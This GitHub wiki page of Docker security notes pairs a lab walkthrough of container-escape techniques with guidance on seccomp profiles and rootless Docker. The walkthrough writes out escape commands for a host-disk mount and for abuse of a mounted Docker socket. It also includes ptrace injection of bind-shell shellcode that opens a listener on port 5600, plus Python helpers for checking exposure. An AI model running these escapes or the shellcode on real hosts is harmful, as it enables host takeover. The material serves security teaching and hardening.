docker security - ghdrako/doc_snipets GitHub Wiki

| ID | Technique Name | Minimal Linux Capabilities |
|----|----------------|----------------------------|
| 1 | Mount the host filesystem | SYS_ADMIN |
| 2 | Use a mounted docker socket | No capability is required |
| 3 | Process Injection | SYS_PTRACE |
| 4 | Adding a malicious kernel module | SYS_MODULE |
| 5 | Reading secrets from the host | DAC_READ_SEARCH |
| 6 | Overriding files on host | DAC_READ_SEARCH, DAC_OVERRIDE |
| 7 | Abusing notify on release | SYS_ADMIN, DAC_OVERRIDE |
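
To check whether a running container holds any of the capabilities listed above, the effective capability mask can be decoded from the `CapEff` line of `/proc/self/status`. The following is a minimal Python sketch, not part of the original write-up: `risky_caps` and `read_cap_eff` are hypothetical helper names, and the bit numbers are the ones defined in the kernel's `linux/capability.h`.

```python
from typing import List

# Bit positions of the capabilities named in the table (linux/capability.h).
RISKY_CAP_BITS = {
    "DAC_OVERRIDE": 1,
    "DAC_READ_SEARCH": 2,
    "SYS_MODULE": 16,
    "SYS_PTRACE": 19,
    "SYS_ADMIN": 21,
}


def risky_caps(cap_eff_hex: str) -> List[str]:
    """Return the table's capabilities that are set in a CapEff hex mask."""
    mask = int(cap_eff_hex, 16)
    return [name for name, bit in RISKY_CAP_BITS.items() if mask & (1 << bit)]


def read_cap_eff(status_path: str = "/proc/self/status") -> str:
    """Read the CapEff field (a hex string) from a /proc/<pid>/status file."""
    with open(status_path) as status:
        for line in status:
            if line.startswith("CapEff:"):
                return line.split()[1]
    raise ValueError("CapEff not found")
```

Inside a container, `risky_caps(read_cap_eff())` lists which of these capabilities the current process holds. An empty list does not rule out technique 2, which needs no capability at all.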
1. Mount the host filesystem

Commands to set up a vulnerable container

docker run -it --cap-drop=ALL --cap-add=SYS_ADMIN --security-opt apparmor=unconfined --device=/dev/:/ ubuntu bash

Note: you can find the host filesystem device by executing ‘lsblk’.

Note: AppArmor blocks the ‘mount’ operation even when the SYS_ADMIN capability is assigned to the container process, so we disable AppArmor when creating the vulnerable container.

TIP: You can see which AppArmor profile, if any, applies to the container’s process by inspecting the ‘/proc/$$/attr/current’ file.
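
The AppArmor check from the tip can also be scripted. The sketch below assumes the usual label format of that file, either a bare `unconfined` or a profile name followed by a mode in parentheses such as `docker-default (enforce)`; the function names are hypothetical.

```python
from typing import Optional, Tuple


def parse_apparmor_label(raw: str) -> Tuple[str, Optional[str]]:
    """Split a label such as 'docker-default (enforce)' into (profile, mode)."""
    label = raw.strip()
    if label.endswith(")") and " (" in label:
        profile, mode = label.rsplit(" (", 1)
        return profile, mode[:-1]  # drop the closing parenthesis
    return label, None  # e.g. 'unconfined' carries no mode suffix


def current_apparmor_label(path: str = "/proc/self/attr/current") -> str:
    """Read the raw AppArmor label of the calling process."""
    with open(path) as handle:
        return handle.read()
```

A result of `("unconfined", None)` from `parse_apparmor_label(current_apparmor_label())` indicates that no AppArmor profile confines the process.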

Commands to escape the container

mount /dev/<DEVICE-FILE> /mnt
ls /mnt
2. Use a mounted docker socket

Commands to set up a vulnerable container

docker run -it --cap-drop=ALL -v /var/run/docker.sock:/run/docker.sock ubuntu bash

docker run -it --cap-drop=ALL --cap-add=SETGID --cap-add=SETUID --cap-add=CHOWN --cap-add=FOWNER --cap-add=DAC_OVERRIDE -v /var/run/docker.sock:/run/docker.sock ubuntu bash

Commands to escape the container

Create a privileged container with the host filesystem mounted inside it.

docker run -it --privileged -v /:/host/ ubuntu bash -c "chroot /host/"

The command above asks the host's Docker daemon, through the mounted socket, to start a new privileged container that mounts the host filesystem. Running chroot into that mount takes us from the first container to the host.
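
From the defensive side, it is easy to check whether a container has been handed a Docker socket. The following Python sketch tests a list of candidate paths; the two defaults are assumptions based on the mount used in this section, and `find_unix_sockets` is a hypothetical helper name.

```python
import os
import stat
from typing import Iterable, List

# Assumed candidate locations: the standard socket path and the
# /run/docker.sock target used in the docker run example of this section.
CANDIDATE_SOCKETS = ("/var/run/docker.sock", "/run/docker.sock")


def find_unix_sockets(paths: Iterable[str] = CANDIDATE_SOCKETS) -> List[str]:
    """Return the paths that exist and are Unix domain sockets."""
    found = []
    for path in paths:
        try:
            mode = os.stat(path).st_mode
        except OSError:
            continue  # missing or inaccessible path
        if stat.S_ISSOCK(mode):
            found.append(path)
    return found
```

Any path returned by `find_unix_sockets()` inside a container deserves a closer look, since access to the daemon socket is equivalent to control over the host's Docker daemon.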

3. Process Injection

TIP: You can check which Linux namespaces are shared between the host and the container by running the ‘lsns’ command on both.

The following tools should be installed within the container:
apt install vim # or any other editor
apt install gcc
apt install net-tools
apt install netcat
Required setup on the container's host:
The host should run a Python HTTP server:
/usr/bin/python3 -m http.server 8080 & 

Commands to setup a vulnerable container

docker run -it --pid=host --cap-drop=ALL --cap-add=SYS_PTRACE --security-opt apparmor=unconfined ubuntu bash
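
Because the container is started with `--pid=host`, its PID namespace should be the same one the host uses. As an alternative to comparing `lsns` output by eye, the namespace identifiers can be read from `/proc/<pid>/ns`. This is a minimal sketch with hypothetical helper names; reading another process's `ns` directory may require additional privileges.

```python
import os
from typing import Dict, List


def namespace_ids(pid: str = "self") -> Dict[str, str]:
    """Map namespace name to its identifier, e.g. 'pid' -> 'pid:[4026531836]'."""
    ns_dir = f"/proc/{pid}/ns"
    return {name: os.readlink(os.path.join(ns_dir, name)) for name in os.listdir(ns_dir)}


def shared_namespaces(a: Dict[str, str], b: Dict[str, str]) -> List[str]:
    """Return the sorted namespace names whose identifiers match in both maps."""
    return sorted(name for name in a.keys() & b.keys() if a[name] == b[name])
```

Collect `namespace_ids()` once on the host and once in the container, then pass both maps to `shared_namespaces`. For this setup, `pid` is expected to appear in the result.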

Note: AppArmor blocks the ‘ptrace’ operation even when the SYS_PTRACE capability is assigned to the container process, so we disable AppArmor when creating the vulnerable container.

Commands to escape the container

This technique uses the infect.c code (by 0x00pf) to build an injector. The shellcode in that file (lines 36-39) is replaced with the following shellcode taken from https://www.exploit-db.com/exploits/41128, and ‘SHELLCODE_SIZE’ (line 33) is changed to 87.

"\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"

Use the commands below to escape the container:

# Find the PID of the HTTP server process that runs on the host and is visible from the container.
ps -eaf | grep "/usr/bin/python3 -m http.server 8080" | head -n 1
# Paste the modified infect.c source into inject.c
vim inject.c
gcc -o inject inject.c
# Inject the shellcode payload that will open a listener on port 5600
./inject <PID>
# Connect to the listener on port 5600
nc <HOST-IP> 5600
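
Two fragments of the shellcode shown earlier can be decoded by hand to confirm what it does before running it. The sketch below is only a worked check in Python: it shows that port 5600 in network byte order is the byte pair `\x15\xe0` that appears in the payload, and that the eight bytes following `\x48\xbb` spell the shell path.

```python
import struct

# TCP ports are stored in network (big-endian) byte order in sockaddr_in.
port_bytes = struct.pack("!H", 5600)
print(port_bytes.hex())  # hex form of the two port bytes

# The 8-byte immediate that follows \x48\xbb in the payload.
shell_path = bytes.fromhex("2f62696e2f2f7368")
print(shell_path.decode("ascii"))
```

If a different port is wanted, the two port bytes are the only part of the payload that would need to change, and the same `struct.pack` call gives the replacement bytes.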

Seccomp

Seccomp, short for secure computing mode, is a Linux kernel feature that allows a process to specify the system calls it is allowed to make. This makes it possible to restrict the types of system calls that can be made by a container, which can help improve the security of the host system by reducing the risk of container escape or privilege escalation. When a process specifies its seccomp profile, the Linux kernel filters incoming system calls and only allows those that are specified in the profile. This means that even if an attacker were to gain access to a container, they would be limited in the types of actions they could perform, reducing the impact of the attack.

To apply a seccomp profile to a container, pass it with the --security-opt seccomp=<profile.json> option of the docker run command. The profile takes effect when the container starts.
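
As an illustration, the sketch below builds such a `docker run` command line from Python. The image name `ubuntu` and the file name `profile.json` are placeholders, and `docker_run_with_seccomp` is a hypothetical helper; the only Docker-specific part is the `--security-opt seccomp=<path>` option.

```python
import shlex
from typing import List


def docker_run_with_seccomp(image: str, profile_path: str, *command: str) -> List[str]:
    """Build a `docker run` argument list that applies a seccomp profile file."""
    return ["docker", "run", "--security-opt", f"seccomp={profile_path}", image, *command]


argv = docker_run_with_seccomp("ubuntu", "profile.json", "bash")
print(shlex.join(argv))
```

The resulting list can be passed directly to `subprocess.run(argv)`, which avoids shell quoting problems if the profile path contains spaces.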

There are two main ways to obtain a seccomp profile: relying on Docker's built-in default profile or creating a custom one. The default profile is applied automatically when no seccomp option is given. It is an allowlist that blocks a few dozen of the more than 300 system calls (around 44 according to the Docker documentation) while staying compatible with most applications. Passing --security-opt seccomp=unconfined disables seccomp filtering entirely, whereas a custom profile can restrict the container to only the system calls your application needs.
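
To check whether a seccomp filter is actually applied to a process, look at the `Seccomp:` field of `/proc/<pid>/status`, where 0 means disabled, 1 strict mode, and 2 filter mode. A minimal parsing sketch follows; `seccomp_mode` is a hypothetical helper name.

```python
SECCOMP_MODES = {0: "disabled", 1: "strict", 2: "filter"}


def seccomp_mode(status_text: str) -> str:
    """Return the seccomp mode named by the 'Seccomp:' line of a status file."""
    for line in status_text.splitlines():
        # The trailing colon keeps the 'Seccomp_filters:' line from matching.
        if line.startswith("Seccomp:"):
            return SECCOMP_MODES[int(line.split()[1])]
    raise ValueError("no Seccomp field found")
```

Inside a container, `seccomp_mode(open("/proc/self/status").read())` is expected to return `filter` when a profile is active and `disabled` when the container was started with `seccomp=unconfined`.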

To create a custom seccomp profile, you can use the Podman (https://podman.io/blogs/2019/10/15/generate-seccomp-profiles.html) or seccomp-gen (https://github.com/blacktop/seccomp-gen) tools. Both tools automate figuring out which calls are being made by the container you intend to use in production and generate a JSON file that can be used as the seccomp profile.

Seccomp does not guarantee security. It is important to understand the system calls that are required for your application and ensure that they are allowed in the seccomp profile.

The following example profile lists a handful of networking and I/O system calls used by a web server application:

{
  "defaultAction": "SCMP_ACT_ALLOW",
  "syscalls": [
    {
      "name": "accept",
      "action": "SCMP_ACT_ALLOW"
    },
    {
      "name": "bind",
      "action": "SCMP_ACT_ALLOW"
    },
    {
      "name": "connect",
      "action": "SCMP_ACT_ALLOW"
    },
    {
      "name": "listen",
      "action": "SCMP_ACT_ALLOW"
    },
    {
      "name": "sendto",
      "action": "SCMP_ACT_ALLOW"
    },
    {
      "name": "recvfrom",
      "action": "SCMP_ACT_ALLOW"
    },
    {
      "name": "read",
      "action": "SCMP_ACT_ALLOW"
    },
    {
      "name": "write",
      "action": "SCMP_ACT_ALLOW"
    }
  ]
}

In this example, defaultAction is set to SCMP_ACT_ALLOW, which means that all system calls not specifically listed in the syscalls array are allowed. The syscalls array lists individual system calls and the action to take for each one (here, every listed call is also allowed), so as written the profile does not block anything. To turn it into an allowlist that blocks every call that is not listed, set defaultAction to SCMP_ACT_ERRNO. Keep in mind that a real container needs considerably more system calls than these eight to start and run. All available actions are described in the manual page for seccomp_rule_add: https://man7.org/linux/man-pages/man3/seccomp_rule_add.3.html.
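
The difference between the two default actions can be made concrete with a short Python sketch. It builds a deny-by-default variant of the example and looks up the action a profile assigns to a given call. The helper names are hypothetical, argument filters are ignored, and the eight-call list is for illustration only; it is too small for a real container to start.

```python
import json
from typing import Dict, List

WEB_SYSCALLS = ["accept", "bind", "connect", "listen", "sendto", "recvfrom", "read", "write"]


def allowlist_profile(names: List[str]) -> Dict:
    """Build a profile that returns an error for every call except the named ones."""
    return {
        "defaultAction": "SCMP_ACT_ERRNO",
        "syscalls": [{"names": list(names), "action": "SCMP_ACT_ALLOW"}],
    }


def action_for(profile: Dict, syscall: str) -> str:
    """Return the action a profile assigns to a syscall (argument filters ignored)."""
    for rule in profile.get("syscalls", []):
        listed = list(rule.get("names", []))
        if "name" in rule:  # single-name form, as used in the example profile
            listed.append(rule["name"])
        if syscall in listed:
            return rule["action"]
    return profile["defaultAction"]


profile = allowlist_profile(WEB_SYSCALLS)
print(json.dumps(profile, indent=2))
```

With this variant, `action_for(profile, "ptrace")` yields `SCMP_ACT_ERRNO`, while the same lookup against a profile whose defaultAction is `SCMP_ACT_ALLOW` yields `SCMP_ACT_ALLOW`.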

More information about seccomp profiles in Docker is available here: https://docs.docker.com/engine/security/seccomp/.

Rootless mode

Docker Rootless mode is a feature that allows users to run Docker containers without having to run the Docker daemon as the root user. This mode provides an additional layer of security by reducing the attack surface of the host system and minimizing the risk of privilege escalation.

Let’s set up a rootless Docker daemon on Ubuntu Linux or Debian Linux. First, make sure you’ve installed Docker from the official Docker package repository instead of the Ubuntu/Debian package:

admin@myhome:~$ sudo apt-get install -y -qq apt-transport-https ca-certificates curl
admin@myhome:~$ sudo mkdir -p /etc/apt/keyrings && sudo chmod -R 0755 /etc/apt/keyrings
admin@myhome:~$ curl -fsSL "https://download.docker.com/linux/ubuntu/gpg" | sudo gpg --dearmor --yes -o /etc/apt/keyrings/docker.gpg
admin@myhome:~$ sudo chmod a+r /etc/apt/keyrings/docker.gpg
admin@myhome:~$ echo "deb [arch=amd64 signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/ubuntu jammy stable" | sudo tee /etc/apt/sources.list.d/docker.list
admin@myhome:~$ sudo apt-get update
admin@myhome:~$ sudo apt-get install -y docker-ce docker-ce-cli containerd.io docker-scan-plugin docker-compose-plugin docker-ce-rootless-extras docker-buildx-plugin

docker-ce-rootless-extras will install a shell script in your /usr/bin directory named dockerd-rootless-setuptool.sh, which will automate the whole process:

admin@myhome:~$ dockerd-rootless-setuptool.sh --help
Usage: /usr/bin/dockerd-rootless-setuptool.sh [OPTIONS] COMMAND
A setup tool for Rootless Docker (dockerd-rootless.sh).
Documentation: https://docs.docker.com/go/rootless/
Options:
  -f, --force        Ignore rootful Docker (/var/run/docker.sock)
  --skip-iptables    Ignore missing iptables
Commands:
  check        Check prerequisites
  install      Install systemd unit (if systemd is available) and show how to manage the service
  uninstall    Uninstall systemd unit

To run this script, we will need a non-root user with a configured environment to be able to run the Docker daemon. Let’s create a dockeruser user first:

admin@myhome:~$ sudo adduser dockeruser
Adding user `dockeruser' ...
Adding new group `dockeruser' (1001) ...
Adding new user `dockeruser' (1001) with group `dockeruser' ...
Creating home directory `/home/dockeruser' ...
Copying files from `/etc/skel' ...
New password:
Retype new password:
passwd: password updated successfully
Changing the user information for dockeruser
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n] y

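Let’s also create a UID map configuration before we proceed. To do that, we will need to install the uidmap package and create the /etc/subuid and /etc/subgid configuration files. Note that tee without the -a option overwrites these files, so check them for existing entries first: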

admin@myhome:~$ sudo apt install -y uidmap
admin@myhome:~$ echo "dockeruser:100000:65536" | sudo tee /etc/subuid
admin@myhome:~$ echo "dockeruser:100000:65536" | sudo tee /etc/subgid
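
Each line in /etc/subuid and /etc/subgid has the form name:start:count, so the entry above gives dockeruser the 65536 subordinate IDs from 100000 through 165535. The following Python sketch, with hypothetical helper names, parses such lines and checks two ranges for overlap, which is worth doing when several users share a host.

```python
from typing import NamedTuple


class SubIdRange(NamedTuple):
    user: str
    start: int
    count: int

    @property
    def last(self) -> int:
        """Highest ID covered by the range."""
        return self.start + self.count - 1


def parse_subid_line(line: str) -> SubIdRange:
    """Parse one 'name:start:count' line from /etc/subuid or /etc/subgid."""
    user, start, count = line.strip().split(":")
    return SubIdRange(user, int(start), int(count))


def overlaps(a: SubIdRange, b: SubIdRange) -> bool:
    """Return True when the two ID ranges share at least one ID."""
    return a.start <= b.last and b.start <= a.last
```

For example, a second user whose range starts at 165536 does not collide with the dockeruser entry, while one starting at 120000 does.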

Log in as dockeruser and run the dockerd-rootless-setuptool.sh script:

admin@myhome:~$ sudo -i -u dockeruser

Make sure the XDG_RUNTIME_DIR environment variable is set and that the systemd user instance can read dockeruser's environment variables:

$ export XDG_RUNTIME_DIR=/run/user/$UID
$ echo 'export XDG_RUNTIME_DIR=/run/user/$UID' >> ~/.bashrc
$ systemctl --user show-environment
HOME=/home/dockeruser
LANG=en_US.UTF-8
LOGNAME=dockeruser
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/snap/bin
SHELL=/bin/bash
SYSTEMD_EXEC_PID=720
USER=dockeruser
XDG_RUNTIME_DIR=/run/user/1001
XDG_DATA_DIRS=/usr/local/share/:/usr/share/:/var/lib/snapd/desktop
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1001/bus

Now, you can install rootless Docker using the dockerd-rootless-setuptool.sh script (some output has been truncated for readability):

$ dockerd-rootless-setuptool.sh install
[INFO] Creating [condensed for brevity]
Active: active (running) since Fri 2023-02-17 14:19:04 UTC; 3s ago
+ DOCKER_HOST=unix:///run/user/1001/docker.sock /usr/bin/docker version
Client: Docker Engine - Community
Version: 23.0.1
[condensed for brevity]
Server: Docker Engine - Community
Engine:
Version: 23.0.1
[condensed for brevity]
rootlesskit:
Version: 1.1.0
[condensed for brevity]
+ systemctl --user enable docker.service
Created symlink /home/dockeruser/.config/systemd/user/default.target.wants/docker.service → /home/dockeruser/.config/systemd/user/docker.service.
[INFO] Installed docker.service successfully.

Now, let’s verify if we can use the Docker rootless daemon:

dockeruser@vagrant:~$ export DOCKER_HOST=unix:///run/user/1001/docker.sock
dockeruser@vagrant:~$ docker ps
CONTAINER ID   IMAGE   COMMAND   CREATED   STATUS   PORTS   NAMES
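
The DOCKER_HOST value used above follows directly from the user's UID, because the rootless daemon places its socket under XDG_RUNTIME_DIR (/run/user/<UID>). Scripts that need to talk to the rootless daemon can derive both variables instead of hard-coding 1001. This is a minimal sketch with hypothetical helper names, assuming the /run/user/<UID> layout shown in this section.

```python
import os
from typing import Dict


def rootless_docker_host(uid: int) -> str:
    """Return the DOCKER_HOST value for a rootless daemon owned by `uid`."""
    runtime_dir = f"/run/user/{uid}"  # same layout as XDG_RUNTIME_DIR=/run/user/$UID
    return f"unix://{runtime_dir}/docker.sock"


def docker_env(uid: int) -> Dict[str, str]:
    """Copy the current environment and point it at the rootless daemon."""
    env = dict(os.environ)
    env["XDG_RUNTIME_DIR"] = f"/run/user/{uid}"
    env["DOCKER_HOST"] = rootless_docker_host(uid)
    return env
```

A call such as `subprocess.run(["docker", "ps"], env=docker_env(os.getuid()))` then reaches the daemon of whichever user runs the script.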

At this point, we have a Docker daemon running as the dockeruser user instead of root. We will be able to run all the services we need the same way we would in a standard configuration. There are some exceptions, such as a Docker in Docker setup, which require further configuration. More detailed information about rootless mode can be found at https://docs.docker.com/engine/security/rootless/.
